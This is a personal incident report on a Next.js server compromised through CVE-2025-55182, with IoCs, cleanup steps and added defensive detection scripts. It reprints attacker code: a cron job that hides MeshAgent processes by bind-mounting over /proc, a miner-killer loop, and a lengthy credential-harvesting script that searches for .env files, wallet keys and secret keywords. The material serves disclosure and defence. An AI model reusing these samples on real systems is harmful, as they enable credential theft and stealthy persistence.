December 6, 2025
React CVE-2025-55182 Exploitation & Multi-Stage "Meshagent" Malware
Public Security Incident Report: React CVE-2025-55182 Exploitation
Date: December 6, 2025
Affected Service: Personal DigitalOcean droplet hosting multiple Next.js applications
Attack Vector: CVE-2025-55182 (React Server Components RCE)
Severity: Critical (CVSS 10.0)
Executive Summary
On December 6, 2025, I discovered my DigitalOcean droplet had been compromised following exploitation of CVE-2025-55182, a critical remote code execution vulnerability in React Server Components. The attack occurred within 24 hours of the public CVE disclosure, highlighting the importance of immediate security patching.
Digital Ocean Abuse Email:
Hi,
We are writing to let you know that your Droplet asleepace-droplet at 192.241.216.26 was identified contributing 295.4 Mbps out of total 109.2 Gbps Distributed Denial of Service attack from 327 droplet(s) on our network aimed at 42.193.120.89.
Details of the Attack:-
Source IP:- 192.241.216.26
Total traffic used in attack:- 109.2 Gbps
asleepace-droplet contribution in attack:- 295.4 Mbps
Target of attack:- 42.193.120.89
Total Number of Droplets involved:- 327
The network traffic from your Droplet matches a pattern of malicious traffic originating from other Droplets targeted at a specific victim. If this traffic wasn’t intentional, it’s very likely your droplet has been compromised and is being used in Distributed Denial of Service attacks. Future reports for additional DDoS activity may require us to temporarily disconnect your droplet from the network to prevent additional abuse.
Your path to resolution will be influenced by how you use asleepace-droplet, your technical expertise, and/or your time available for investigation.
Path 1 - If asleepace-droplet does not collect or contain any data you need to preserve, we suggest destroying this Droplet and starting over. This is the most straightforward way to get back up and running. Please note, you will still be billed for your Droplet usage, even in a network disconnected state.
Path 2 - If asleepace-droplet stores data you need to recover, please follow our recovery checklist on https://www.digitalocean.com/docs/droplets/resources/recovery-iso/ before destroying this Droplet and starting over. This is the best path if you do not wish to attempt recovery of your Droplet, but do need to recover data from it before destroying it.
Path 3 - If you are confident in your technical ability and want to troubleshoot, identify, and triage the problem on your own, we do have a resource available at https://www.digitalocean.com/docs/droplets/resources/ddos/ that includes some suggestions.
We would also like to make sure you're aware of a few things before you begin taking any of the above steps, as they may help guide you to the correct choice in this issue.
First, as this indicates a high probability that your Droplet has been compromised, please be aware that merely changing passwords or adding a firewall rule or any other form of access control won’t resolve this issue, as your Droplet has already been compromised. A malicious attacker has installed software on your Droplet, which was then used to launch this attack.
Finally, as a self-managed provider, we cannot access customer Droplets at the command line or application level. This means we can only provide you guidance from the information you give us about your Droplet server in regards to error logs, configuration files, or the output of commands.
If you believe this is a false positive, get stuck, or have a question please do not hesitate to reply to this email to get more support!
Best,
Security Operations Center
DigitalOcean
This report documents the attack timeline, malware analysis, and remediation steps to help others identify and respond to similar compromises.
Timeline
| Date/Time | Event |
|---|---|
| Dec 3, 2025 | CVE-2025-55182 publicly disclosed by React team |
| Dec 4, 00:20 UTC | Server compromised via vulnerable Next.js 15.0.3 application |
| Dec 4-6 | Attackers conducted reconnaissance and deployed multiple malware families |
| Dec 6, 2025 | Compromise discovered via DigitalOcean DDoS abuse notification |
| Dec 6, 23:00 UTC | Malware removal and patching completed |
Vulnerability Details
CVE-2025-55182 - React Server Components Remote Code Execution
- CVSS Score: 10.0 (Critical)
- Affected Versions: Next.js using React 19.0.0 - 19.2.0
- Vulnerable Packages: react-server-dom-webpack, react-server-dom-parcel, react-server-dom-turbopack
My Vulnerable Stack:
- Next.js 15.0.3
- React 19.0.0-rc-66855b96-20241106
- Running on Ubuntu 24.04 LTS
Patched To:
- Next.js 15.0.5+
- React 19.2.1+
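To turn the version ranges above into a repeatable check, here is an added example written for this report (it is not code from the original post, nor from the React or Next.js projects). It reads package.json and package-lock.json and flags any copy of next, react, react-dom or the react-server-dom-* packages whose version falls in the ranges listed here. The ranges and the "Next.js < 15.0.5" rule are taken from this report; the regular expression, the function names and the decision to treat a release candidate like 19.0.0-rc-66855b96-20241106 as its base version are this example's own assumptions, so confirm the exact patched versions against the React advisory linked under Additional Resources.

```python
# Added example for this report (not code from the original post, React or Next.js):
# flag package versions that fall in the ranges the report lists for
# CVE-2025-55182. The ranges (React 19.0.0 - 19.2.0 affected, 19.2.1+ patched,
# Next.js < 15.0.5 treated as vulnerable) come from the report; the React
# advisory is authoritative for the exact patched version of each package.
import json
import re
from pathlib import Path

REACT_PACKAGES = ("react", "react-dom",
                  "react-server-dom-webpack", "react-server-dom-parcel",
                  "react-server-dom-turbopack")

# Accepts "19.2.1", "^15.0.3", "~19.0.0", "19.0.0-rc-66855b96-20241106"; a caret or
# tilde range is resolved to its lower bound, the conservative choice for a check.
_VERSION_RE = re.compile(r"^\s*[v=^~]*\s*(\d+)\.(\d+)\.(\d+)(?:-([0-9A-Za-z.-]+))?")


def parse_version(spec):
    """Return (major, minor, patch, prerelease) or None for specs with no
    concrete version such as "latest" or "workspace:*"."""
    m = _VERSION_RE.match(spec)
    if not m:
        return None
    return (int(m.group(1)), int(m.group(2)), int(m.group(3)), m.group(4))


def react_is_vulnerable(version):
    """React 19.0.0 through 19.2.0 is in the affected range. Pre-releases of an
    affected base version count as affected: the compromised host in this
    report ran 19.0.0-rc-66855b96-20241106 (assumption: treat RCs as their base)."""
    v = parse_version(version)
    if v is None:
        return False
    return (19, 0, 0) <= v[:3] <= (19, 2, 0)


def nextjs_is_vulnerable(version):
    """The report's rule: anything below Next.js 15.0.5 is vulnerable."""
    v = parse_version(version)
    return v is not None and v[:3] < (15, 0, 5)


def audit_project(package_json_text, lock_json_text=None):
    """Return (package, version, source, reason) tuples. package.json gives the
    declared ranges; package-lock.json (lockfileVersion 2/3 "packages" map) gives
    the versions actually installed, including nested copies under node_modules."""
    candidates = []
    pkg = json.loads(package_json_text)
    for section in ("dependencies", "devDependencies"):
        for name, spec in pkg.get(section, {}).items():
            candidates.append((name, spec, "package.json"))
    if lock_json_text:
        lock = json.loads(lock_json_text)
        for path, info in lock.get("packages", {}).items():
            if path and "version" in info:  # "" is the root project itself
                name = path.rsplit("node_modules/", 1)[-1]
                candidates.append((name, info["version"], "package-lock.json"))
    findings = []
    for name, version, source in candidates:
        if name == "next" and nextjs_is_vulnerable(version):
            findings.append((name, version, source, "Next.js older than 15.0.5"))
        elif name in REACT_PACKAGES and react_is_vulnerable(version):
            findings.append((name, version, source, "React 19.0.0-19.2.0 (CVE-2025-55182)"))
    return findings


def audit_directory(project_dir):
    """Audit a real project directory on disk."""
    root = Path(project_dir)
    lock = root / "package-lock.json"
    return audit_project((root / "package.json").read_text(),
                         lock.read_text() if lock.exists() else None)


# Constructed sample mirroring the report's vulnerable stack (not the author's real files)
SAMPLE_PACKAGE_JSON = json.dumps({"dependencies": {
    "next": "15.0.3",
    "react": "19.0.0-rc-66855b96-20241106",
    "react-dom": "19.0.0-rc-66855b96-20241106"}})
SAMPLE_LOCK_JSON = json.dumps({"lockfileVersion": 3, "packages": {
    "": {"name": "example-app"},
    "node_modules/next": {"version": "15.0.3"},
    "node_modules/react": {"version": "19.0.0-rc-66855b96-20241106"},
    "node_modules/next/node_modules/react-server-dom-webpack": {"version": "19.0.0-rc-66855b96-20241106"}}})

if __name__ == "__main__":
    for finding in audit_project(SAMPLE_PACKAGE_JSON, SAMPLE_LOCK_JSON):
        print("VULNERABLE:", *finding)
```

Run `audit_directory("/path/to/app")` against a checked-out project; the lockfile entries matter more than the declared ranges, because a caret range in package.json can resolve to a patched or an affected version depending on when `npm install` last ran.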
Attack Analysis
Entry Point
The attackers exploited the React RCE vulnerability in my Next.js application to gain initial code execution. No authentication was required.
Malware Deployed
I discovered five distinct malware families on the compromised server:
1. Credential Harvesting Script
A comprehensive scanner targeting:
- .env files (50+ filename variations)
- Crypto wallet files and private keys
- API keys (GitHub, Stripe, OpenAI, etc.)
- Database credentials
- Session tokens
Evidence of exfiltration:
```json
{"destination":"_root_smart-contracts_frontend_.env.local","success":true}
```
2. MeshAgent RAT (Remote Access Trojan)
- Purpose: Persistent remote access
- Persistence: systemd service + cron job
- Stealth: Process hiding via /proc bind mounts
- Detection evasion: Hidden from ps, top, htop
Cron job (ran every minute):
```bash
pgrep -f meshagent | while read pid; do
mount -o bind /tmp/empty /proc/$pid 2>/dev/null
done
```
3. DDoS Botnet Client
- Binary name: fghgf (obfuscated)
- Attack contribution: 295.4 Mbps (part of 109.2 Gbps attack)
- Total infected servers: 327 DigitalOcean droplets
- Target: IP address in China
4. Anti-Competitive Script
A script that killed competing malware (especially crypto miners) to preserve resources:
```bash
while true; do
# Kill XMRig and other miners
pgrep xmrig && pkill -9 xmrig
sleep 45
done
```
5. XMRig Monero Miner (Attempted)
- Status: Dropper found but not executed (caught in time)
- Target: Monero (XMR) cryptocurrency mining
- Pool: pool.hashvault.pro:443
- Disguise: Masqueraded as “system-update-service” systemd unit
Detection Indicators
How I Discovered the Compromise
- DigitalOcean Abuse Email - DDoS participation notification
- Suspicious Processes:
```text
meshagent
fghgf
ci87vl87hn87lju2
[kswapd0]   (fake kernel process)
```
- Unusual Cron Jobs:
```bash
crontab -l # Revealed meshagent hiding script
```
- Suspicious Files:
```text
/tmp/find.sh (36KB credential scanner)
/dev/x86 (UPX-packed malware)
/dev/health.sh (miner killer)
```
Key Indicators of Compromise (IoCs)
Files to check:
```text
/tmp/fghgf
/tmp/meshagent*
/tmp/find.sh
/tmp/.del
/dev/x86
/dev/health.sh
/usr/local/mesh_services/
```
Processes:
```bash
ps aux | grep -E "meshagent|fghgf|ci87"
```
Network connections:
```bash
netstat -tupn | grep ESTABLISHED
# Look for unknown IPs, especially mining pools
```
Crontabs:
```bash
crontab -l
sudo cat /etc/crontab
sudo ls /var/spool/cron/crontabs/
```
Systemd services:
```bash
systemctl list-units --type=service | grep -v "systemd\|ssh\|nginx"
# Look for suspicious service names like "system-update-service"
```
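The commands above depend on `ps` and `crontab -l` telling the truth, which the MeshAgent cron job (section 2 of the malware list) is designed to prevent. The following is an added example written for this report, not code from the original post or from MeshAgent: it automates the two checks that matter most here. First, a bind mount of an empty directory over /proc/<pid> is itself recorded in /proc/self/mountinfo with a mount point of the form /proc/<digits>, so hidden PIDs can be recovered from there without trusting `ps`. Second, the process names and cron fragments from this IoC list are matched against `ps aux` and `crontab -l` output, and a "[kswapd0]"-style fake kernel thread is recognised by its non-empty cmdline. The mountinfo, ps and crontab samples are constructed to mirror the incident; `run_host_checks()` reads the live host instead. Function names and the indicator lists are this example's assumptions.

```python
# Added example for this report (not code from the original post): automate two of
# the host checks described above. (1) The MeshAgent cron job hides a process by
# bind-mounting an empty directory over /proc/<pid>; every such mount is listed
# in /proc/self/mountinfo with a mount point of the form /proc/<digits>.
# (2) Process names and cron fragments from this incident's IoC list are matched
# against `ps aux` and `crontab -l` output. The sample inputs below are
# constructed to mirror the incident; run_host_checks() reads the live host.
import os
import re
import subprocess

PROC_MOUNT_RE = re.compile(r"^/proc/(\d+)$")

# Indicator lists are assumptions drawn from this report; extend them for your environment.
SUSPICIOUS_PROCESS_NAMES = ("meshagent", "fghgf", "ci87vl87hn87lju2", "xmrig")
SUSPICIOUS_CRON_FRAGMENTS = ("mount -o bind", "/proc/$pid", "meshagent", "/tmp/", "/dev/")


def hidden_pids_from_mountinfo(mountinfo_text):
    """PIDs whose /proc/<pid> directory is covered by a mount.
    In /proc/self/mountinfo the fifth whitespace-separated field is the mount
    point (spaces inside paths are escaped by the kernel, so splitting is safe)."""
    hidden = []
    for line in mountinfo_text.splitlines():
        fields = line.split()
        if len(fields) >= 5:
            m = PROC_MOUNT_RE.match(fields[4])
            if m:
                hidden.append(int(m.group(1)))
    return hidden


def is_fake_kernel_thread(cmdline):
    """A real kernel thread has an empty /proc/<pid>/cmdline; `ps` draws the
    brackets itself. A non-empty cmdline that starts with '[' (the "[kswapd0]"
    seen in this incident) is a user process imitating a kernel thread."""
    return cmdline.strip("\0 ").startswith("[")


def suspicious_ps_lines(ps_output):
    """Lines of `ps aux` output whose command matches a known indicator."""
    hits = []
    for line in ps_output.splitlines()[1:]:  # skip the header row
        lowered = line.lower()
        if any(name in lowered for name in SUSPICIOUS_PROCESS_NAMES):
            hits.append(line.strip())
    return hits


def suspicious_cron_lines(crontab_output):
    """Crontab entries that bind-mount over /proc or run payloads from /tmp or /dev."""
    hits = []
    for line in crontab_output.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        if any(frag in line for frag in SUSPICIOUS_CRON_FRAGMENTS):
            hits.append(line.strip())
    return hits


def run_host_checks():
    """Run the same checks against the live (Linux) host."""
    with open("/proc/self/mountinfo") as f:
        mountinfo = f.read()
    ps = subprocess.run(["ps", "aux"], capture_output=True, text=True, check=False).stdout
    cron = subprocess.run(["crontab", "-l"], capture_output=True, text=True, check=False).stdout
    fakes = []
    for entry in os.listdir("/proc"):
        if entry.isdigit():
            try:
                with open(f"/proc/{entry}/cmdline", "rb") as f:
                    cmdline = f.read().decode(errors="replace")
            except OSError:
                continue  # a hidden PID fails here; it is reported via mountinfo instead
            if is_fake_kernel_thread(cmdline):
                fakes.append(int(entry))
    return {
        "hidden_pids": hidden_pids_from_mountinfo(mountinfo),
        "fake_kernel_threads": fakes,
        "processes": suspicious_ps_lines(ps),
        "cron": suspicious_cron_lines(cron),
    }


# Constructed samples (not captured from the compromised host)
SAMPLE_MOUNTINFO = """\
24 30 0:22 / /proc rw,nosuid,nodev,noexec,relatime shared:13 - proc proc rw
250 24 8:1 /tmp/empty /proc/4242 rw,relatime shared:1 - ext4 /dev/vda1 rw
31 24 0:23 / /sys rw,nosuid,nodev,noexec,relatime shared:14 - sysfs sysfs rw
"""
SAMPLE_PS = """\
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.1 167000 11000 ? Ss 00:00 0:01 /sbin/init
root 4242 0.4 0.3 20000 8000 ? Sl 00:20 1:12 /tmp/meshagent
root 4310 95.0 0.5 90000 12000 ? R 00:21 9:59 /tmp/fghgf
www-data 900 0.0 0.2 50000 6000 ? S 00:00 0:00 nginx: worker process
"""
SAMPLE_CRONTAB = """\
# m h dom mon dow command
* * * * * pgrep -f meshagent | while read pid; do mount -o bind /tmp/empty /proc/$pid 2>/dev/null; done
0 3 * * * /usr/bin/certbot renew
"""

if __name__ == "__main__":
    print("hidden PIDs:", hidden_pids_from_mountinfo(SAMPLE_MOUNTINFO))
    print("processes:", suspicious_ps_lines(SAMPLE_PS))
    print("cron:", suspicious_cron_lines(SAMPLE_CRONTAB))
```

A PID that appears in `hidden_pids` but not in `ps` output is the strongest signal in this set: the mount table cannot be hidden by the same trick, and an unmount (`umount /proc/<pid>`) restores visibility for the rest of the investigation.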
Immediate Actions Taken
- Killed Malicious Processes:
```bash
sudo pkill -9 meshagent
sudo pkill -9 fghgf
sudo pkill -9 xmrig
```
- Removed Malware:
```bash
sudo rm -rf /tmp/meshagent* /tmp/fghgf /tmp/find.sh
sudo rm -rf /dev/x86 /dev/health.sh
sudo rm -rf /usr/local/mesh_services/
```
- Removed Persistence:
```bash
crontab -r
sudo systemctl disable meshagent
sudo rm /usr/lib/systemd/system/meshagent.service
sudo systemctl daemon-reload
```
- Patched Vulnerability:
```bash
npm install next@15.0.5 react@latest react-dom@latest
npm run build
# Restart application
```
- Rotated Compromised Credentials:
  - Database passwords
  - API keys
  - OAuth secrets
  - Session tokens
Security Hardening
```bash
# Install fail2ban
sudo apt install fail2ban -y
# Configure firewall
sudo ufw allow 22/tcp
sudo ufw allow 80/tcp
sudo ufw allow 443/tcp
sudo ufw enable
# Restrict database to localhost
sudo nano /etc/postgresql/*/main/postgresql.conf
# Set: listen_addresses = 'localhost'
```
Lessons Learned
1. Patch Immediately for Critical CVEs
The attack occurred 24 hours after disclosure. For CVSS 10.0 vulnerabilities:
- Subscribe to security advisories
- Patch within hours, not days
- Consider automated dependency updates (Dependabot)
2. Defense in Depth
A single vulnerability led to complete compromise. Implement:
- Web Application Firewall (WAF)
- Intrusion Detection System (IDS)
- Host-based firewall
- File integrity monitoring
3. Monitoring is Critical
The compromise went undetected for 2+ days. Implement:
- Log aggregation and alerting
- Process monitoring
- Network traffic analysis
- File integrity checks (AIDE, Tripwire)
4. Assume Breach
Once discovered:
- Rotate ALL credentials immediately
- Review all access logs
- Consider full system rebuild
- Don’t trust “cleanup” - malware may have backdoors
Recommendations for Next.js Users
Immediate Actions
- Check Your Version:
```bash
cat package.json | grep '"next"'
```
- If Vulnerable (Next.js < 15.0.5), Update NOW:
```bash
npm install next@15.0.5 react@latest react-dom@latest
npm run build
# Restart your application
```
- Scan for Compromise:
```bash
# Check for suspicious processes
ps aux | grep -E "meshagent|xmrig|fghgf"
# Check cron jobs
crontab -l
# Check for malware files
sudo find /tmp /dev -type f -executable -mtime -7
```
Long-term Security
- Enable automated security updates
- Implement log monitoring (ELK stack, Datadog, etc.)
- Use a process manager with monitoring (PM2, systemd)
- Regular security audits
- Principle of least privilege (don’t run apps as root)
Malware Samples
Below are snippets of some of the discovered Malware related to the incident:
Malware Sample 1: Credential Harvesting Script
```bash
# Malware Sample 1: Credential Harvesting Script
# File: find.sh
# Size: ~36KB
# Purpose: Scan filesystem for credentials and exfiltrate via curl
#!/bin/bash
# ============================================
# Sensitive Config File Search Script
# Search config/env files and wallet/web3 configs
# ============================================
# Color definitions
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
CYAN='\033[0;36m'
NC='\033[0m' # No Color
# Default search path
SEARCH_PATH="${1:-.}"
# Log file with timestamp
TIMESTAMP=$(date +"%Y%m%d_%H%M%S")
LOG_FILE="web3_scan_${TIMESTAMP}.log"
# Log function (console + file)
log() {
echo -e "$1"
echo -e "$1" | sed 's/\x1b\[[0-9;]*m//g' >> "$LOG_FILE"
}
log "${CYAN}============================================${NC}"
log "${CYAN} Web3/Wallet/Blockchain Config Scanner${NC}"
log "${CYAN}============================================${NC}"
log "${YELLOW}Search Path: ${SEARCH_PATH}${NC}"
log "${YELLOW}Log File: ${LOG_FILE}${NC}"
log "Scan Time: $(date)"
log ""
# ============================================
# 1. Search ENV files
# ============================================
log "${GREEN}[1] Search ENV Files${NC}"
log "----------------------------------------"
ENV_PATTERNS=(
".env"
".env.*"
"*.env"
".env.local"
".env.development"
".env.production"
".env.example"
".envrc"
)
# Exclude system/cache directories (Linux)
EXCLUDES="/proc|/sys|/dev|/run|/snap|/boot|/lib|/lib64|/usr/lib|/usr/share|/var/lib|/var/cache|/var/log|node_modules|\.git|\.cache|__pycache__|\.npm|\.yarn|\.nvm|vendor|\.local/share|\.vscode|\.config/chromium|\.mozilla"
for pattern in "${ENV_PATTERNS[@]}"; do
results=$(find "$SEARCH_PATH" -type f -iname "$pattern" 2>/dev/null | grep -Ev "$EXCLUDES")
if [ -n "$results" ]; then
log "${BLUE}Pattern: $pattern${NC}"
echo "$results" | while read -r file; do
log " -> $file"
done
fi
done
log ""
# ============================================
# 2. Search Wallet/Web3/Blockchain Files
# ============================================
log "${GREEN}[2] Search Wallet/Web3/Blockchain Files${NC}"
log "----------------------------------------"
WALLET_WEB3_PATTERNS=(
# Wallet/Key files
"*wallet*"
"*keystore*"
"*keystores*"
"*private*key*"
"*privatekey*"
"*secret*"
"*mnemonic*"
"*seed*phrase*"
"*credentials*"
# Web3 frameworks
"*web3*"
"*ethers*"
"*hardhat*"
"*truffle*"
"*foundry*"
"*brownie*"
"*ganache*"
"*remix*"
# Wallet apps
"*metamask*"
"*phantom*"
"*rabby*"
"*trustwallet*"
"*ledger*"
"*trezor*"
# Blockchain providers
"*infura*"
"*alchemy*"
"*moralis*"
"*quicknode*"
"*chainstack*"
# Blockchain config
"*blockchain*"
"*contract*"
"*deploy*"
"*ethereum*"
# EVM chains
"*mainnet*"
"*testnet*"
"*goerli*"
"*sepolia*"
"*bsc*"
"*polygon*"
"*arbitrum*"
"*optimism*"
"*avalanche*"
"*fantom*"
"*cronos*"
"*base*"
"*zksync*"
"*linea*"
# Solana ecosystem
"*solana*"
"*anchor*"
"*spl-token*"
# Other L1
"*cosmos*"
"*polkadot*"
"*near*"
"*aptos*"
"*sui*"
"*ton*"
"*tron*"
# DeFi
"*uniswap*"
"*pancakeswap*"
"*aave*"
"*compound*"
"*curve*"
"*dex*"
"*swap*"
"*liquidity*"
"*staking*"
# NFT
"*nft*"
"*opensea*"
"*ipfs*"
)
for pattern in "${WALLET_WEB3_PATTERNS[@]}"; do
results=$(find "$SEARCH_PATH" -type f -iname "$pattern" 2>/dev/null | grep -Ev "$EXCLUDES")
if [ -n "$results" ]; then
log "${BLUE}Pattern: $pattern${NC}"
echo "$results" | while read -r file; do
log " -> $file"
done
fi
done
log ""
# ============================================
# 3. Search Sensitive Content Keywords
# ============================================
log "${GREEN}[3] Search Sensitive Content Keywords${NC}"
log "----------------------------------------"
# Define sensitive keywords (Web3/Wallet/Blockchain/Database/Payment focused)
SENSITIVE_KEYWORDS=(
# ========== Wallet/Private Key ==========
"PRIVATE_KEY"
"PRIVATEKEY"
"PRIV_KEY"
"PRIVKEY"
"SECRET_KEY"
"SECRETKEY"
"MNEMONIC"
"SEED_PHRASE"
"SEEDPHRASE"
"RECOVERY_PHRASE"
"BACKUP_PHRASE"
"WALLET_SECRET"
"WALLET_KEY"
"KEYSTORE"
"KEY_STORE"
"PASSPHRASE"
"PASS_PHRASE"
"HD_WALLET"
"BIP39"
"BIP44"
"DERIVATION_PATH"
# ========== Web3/Blockchain RPC ==========
"RPC_URL"
"RPC_ENDPOINT"
"RPC_KEY"
"WEB3_PROVIDER"
"WEB3_URL"
"PROVIDER_URL"
"NODE_URL"
"NODE_KEY"
"BLOCKCHAIN_URL"
"CHAIN_RPC"
"CHAIN_ID"
"NETWORK_URL"
"MAINNET_RPC"
"MAINNET_URL"
"TESTNET_RPC"
"TESTNET_URL"
"WSS_URL"
"WSS_ENDPOINT"
"WEBSOCKET_URL"
"JSON_RPC"
# ========== Blockchain Provider API ==========
"INFURA_KEY"
"INFURA_API"
"INFURA_SECRET"
"INFURA_PROJECT"
"INFURA_ID"
"ALCHEMY_KEY"
"ALCHEMY_API"
"ALCHEMY_URL"
"ALCHEMY_SECRET"
"MORALIS_KEY"
"MORALIS_API"
"MORALIS_SECRET"
"QUICKNODE_KEY"
"QUICKNODE_URL"
"ANKR_KEY"
"ANKR_API"
"CHAINSTACK_KEY"
"GETBLOCK_KEY"
"NODEREAL_KEY"
"BLOCKDAEMON_KEY"
"POKT_KEY"
"BLAST_API"
"GROVE_KEY"
# ========== Smart Contract Deploy ==========
"DEPLOYER_PRIVATE"
"DEPLOYER_KEY"
"DEPLOYER_ADDRESS"
"OWNER_PRIVATE"
"OWNER_KEY"
"ADMIN_PRIVATE"
"ADMIN_KEY"
"SIGNER_KEY"
"SIGNER_PRIVATE"
"OPERATOR_KEY"
"RELAYER_KEY"
"HOT_WALLET"
"COLD_WALLET"
"CONTRACT_ADDRESS"
"CONTRACT_OWNER"
"PROXY_ADMIN"
"IMPLEMENTATION"
"VERIFIED_CONTRACT"
# ========== Block Explorer API ==========
"ETHERSCAN_API"
"ETHERSCAN_KEY"
"BSCSCAN_API"
"BSCSCAN_KEY"
"POLYGONSCAN_API"
"POLYGONSCAN_KEY"
"ARBISCAN_API"
"ARBISCAN_KEY"
"SNOWTRACE_API"
"FTMSCAN_API"
"OPTIMISM_API"
"BASESCAN_API"
"CELOSCAN_API"
"CRONOSCAN_API"
"MOONSCAN_API"
"EXPLORER_API"
# ========== Wallet Address ==========
"WALLET_ADDRESS"
"WALLET_ADDR"
"FROM_ADDRESS"
"TO_ADDRESS"
"SENDER_ADDRESS"
"RECEIVER_ADDRESS"
"RECIPIENT"
"TREASURY"
"TREASURY_ADDRESS"
"FEE_RECIPIENT"
"FEE_ADDRESS"
"MULTISIG"
"MULTISIG_ADDRESS"
"SAFE_ADDRESS"
"GNOSIS_SAFE"
"VAULT_ADDRESS"
# ========== Exchange API (CEX) ==========
"BINANCE_API"
"BINANCE_SECRET"
"BINANCE_KEY"
"COINBASE_API"
"COINBASE_SECRET"
"COINBASE_KEY"
"KRAKEN_API"
"KRAKEN_SECRET"
"HUOBI_API"
"HUOBI_SECRET"
"OKX_API"
"OKX_SECRET"
"OKEX_API"
"KUCOIN_API"
"KUCOIN_SECRET"
"BYBIT_API"
"BYBIT_SECRET"
"GATE_API"
"GATE_SECRET"
"BITGET_API"
"BITGET_SECRET"
"MEXC_API"
"MEXC_SECRET"
"DERIBIT_API"
"BITFINEX_API"
"GEMINI_API"
"CRYPTO_COM_API"
"EXCHANGE_KEY"
"EXCHANGE_SECRET"
"TRADING_KEY"
"TRADING_SECRET"
"CEX_API"
"CEX_SECRET"
# ========== DeFi Protocol ==========
"UNISWAP_KEY"
"PANCAKE_KEY"
"SUSHISWAP_KEY"
"AAVE_KEY"
"COMPOUND_KEY"
"CURVE_KEY"
"BALANCER_KEY"
"1INCH_API"
"ONEINCH_API"
"PARASWAP_API"
"0X_API"
"ZEROX_API"
"DEX_API"
"ROUTER_ADDRESS"
"FACTORY_ADDRESS"
"POOL_ADDRESS"
"LP_TOKEN"
"FLASH_LOAN"
"SLIPPAGE"
# ========== NFT/IPFS ==========
"OPENSEA_API"
"OPENSEA_KEY"
"RARIBLE_API"
"BLUR_API"
"NFT_STORAGE"
"IPFS_KEY"
"IPFS_SECRET"
"PINATA_API"
"PINATA_SECRET"
"PINATA_JWT"
"WEB3_STORAGE"
"FILECOIN_KEY"
"ARWEAVE_KEY"
"METADATA_URI"
"BASE_URI"
"TOKEN_URI"
# ========== Bridge/Cross-chain ==========
"BRIDGE_KEY"
"BRIDGE_API"
"LAYERZERO"
"STARGATE"
"WORMHOLE"
"AXELAR"
"MULTICHAIN"
"CELER"
"HOP_PROTOCOL"
"ACROSS"
"SYNAPSE"
# ========== Oracle ==========
"CHAINLINK_KEY"
"CHAINLINK_NODE"
"ORACLE_KEY"
"PRICE_FEED"
"DATA_FEED"
"BAND_PROTOCOL"
"PYTH_KEY"
"API3_KEY"
# ========== L2/Rollup ==========
"OPTIMISM_KEY"
"ARBITRUM_KEY"
"ZKSYNC_KEY"
"STARKNET_KEY"
"POLYGON_KEY"
"BASE_KEY"
"LINEA_KEY"
"SCROLL_KEY"
"MANTLE_KEY"
"BLAST_KEY"
"MODE_KEY"
"ROLLUP_KEY"
"SEQUENCER"
# ========== Solana Ecosystem ==========
"SOLANA_PRIVATE"
"SOLANA_KEY"
"SOLANA_RPC"
"PHANTOM_KEY"
"ANCHOR_WALLET"
"SPL_TOKEN"
"METAPLEX_KEY"
"HELIUS_API"
"HELIUS_KEY"
"SHYFT_API"
"TRITON_KEY"
"JUPITER_API"
"RAYDIUM_KEY"
"ORCA_KEY"
"MARINADE_KEY"
# ========== Other L1 Chains ==========
"COSMOS_KEY"
"COSMOS_MNEMONIC"
"POLKADOT_KEY"
"NEAR_KEY"
"NEAR_PRIVATE"
"APTOS_KEY"
"APTOS_PRIVATE"
"SUI_KEY"
"SUI_PRIVATE"
"TON_KEY"
"TON_MNEMONIC"
"TRON_KEY"
"TRON_PRIVATE"
"AVAX_KEY"
"FTM_KEY"
"CELO_KEY"
"HARMONY_KEY"
"KLAYTN_KEY"
"AURORA_KEY"
# ========== Database Credentials ==========
"DB_PASSWORD"
"DB_PASS"
"DB_USER"
"DB_HOST"
"DATABASE_PASSWORD"
"DATABASE_URL"
"DATABASE_URI"
"MYSQL_PASSWORD"
"MYSQL_ROOT"
"POSTGRES_PASSWORD"
"POSTGRES_USER"
"PG_PASSWORD"
"MONGO_PASSWORD"
"MONGO_USER"
"MONGODB_URI"
"MONGODB_URL"
"REDIS_PASSWORD"
"REDIS_URL"
"REDIS_AUTH"
"CONNECTION_STRING"
"SQL_PASSWORD"
"SUPABASE_KEY"
"SUPABASE_URL"
# ========== Payment Services ==========
"STRIPE_KEY"
"STRIPE_SECRET"
"STRIPE_WEBHOOK"
"STRIPE_API"
"PAYPAL_SECRET"
"PAYPAL_CLIENT"
"PAYPAL_KEY"
"PAYMENT_KEY"
"PAYMENT_SECRET"
"MERCHANT_KEY"
"MERCHANT_ID"
"CHECKOUT_KEY"
"RAZORPAY_KEY"
"RAZORPAY_SECRET"
"SQUARE_KEY"
"ADYEN_KEY"
"BRAINTREE_KEY"
"COINPAYMENTS_KEY"
"NOWPAYMENTS_KEY"
"BITPAY_KEY"
"CRYPTO_PAY"
# ========== Bot/Automation ==========
"BOT_TOKEN"
"BOT_SECRET"
"TELEGRAM_BOT"
"TELEGRAM_TOKEN"
"DISCORD_BOT"
"DISCORD_TOKEN"
"DISCORD_WEBHOOK"
"SLACK_BOT"
"SLACK_TOKEN"
"TWITTER_API"
"TWITTER_BEARER"
# ========== Regex Patterns ==========
"0x[a-fA-F0-9]{64}" # Ethereum private key (64 hex)
"0x[a-fA-F0-9]{40}" # Ethereum address (40 hex)
"[1-9A-HJ-NP-Za-km-z]{87,88}" # Solana private key (base58)
"[1-9A-HJ-NP-Za-km-z]{43,44}" # Solana address (base58)
"-----BEGIN.*PRIVATE" # PEM private key header
)
log "${YELLOW}Searching files with sensitive keywords...${NC}"
for keyword in "${SENSITIVE_KEYWORDS[@]}"; do
results=$(grep -ril "$keyword" "$SEARCH_PATH" 2>/dev/null | grep -Ev "$EXCLUDES" | grep -v "\.min\." | head -50)
if [ -n "$results" ]; then
log "${RED}Keyword: $keyword${NC}"
echo "$results" | while read -r file; do
log " -> $file"
done
fi
done
log ""
# ============================================
# 4. Output Summary
# ============================================
log "${CYAN}============================================${NC}"
log "${CYAN} Search Complete - Summary${NC}"
log "${CYAN}============================================${NC}"
total_env=$(find "$SEARCH_PATH" -type f \( -iname ".env*" -o -iname "*.env" \) 2>/dev/null | grep -Ev "$EXCLUDES" | wc -l)
total_wallet=$(find "$SEARCH_PATH" -type f \( -iname "*wallet*" -o -iname "*keystore*" -o -iname "*private*key*" -o -iname "*mnemonic*" \) 2>/dev/null | grep -Ev "$EXCLUDES" | wc -l)
